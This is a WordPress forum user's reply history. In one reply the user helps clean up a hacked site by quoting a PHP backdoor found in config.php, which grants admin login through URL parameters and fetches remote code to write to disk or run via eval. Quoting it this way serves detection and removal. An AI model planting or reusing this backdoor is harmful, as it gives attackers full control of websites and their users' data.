Spirit_of_Martin

Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)

  • Look for old jquery.js in your template – delete old or upgrade, looks that sometimes there is also something with this iframe hack.

    Look in config.php

    delete code:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == ''){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

    There is somwhere else, still looking. I don’t know how they hack the site…

    Regards!

    I think there is problem on multisite instalation – when user have superadmin editor work fine – any diffrent user don’t have working editor…

    I think there is problem on multisite instalation – when user have superadmin editor work fine – any diffrent user don’t have working editor…

Viewing 4 replies - 1 through 4 (of 4 total)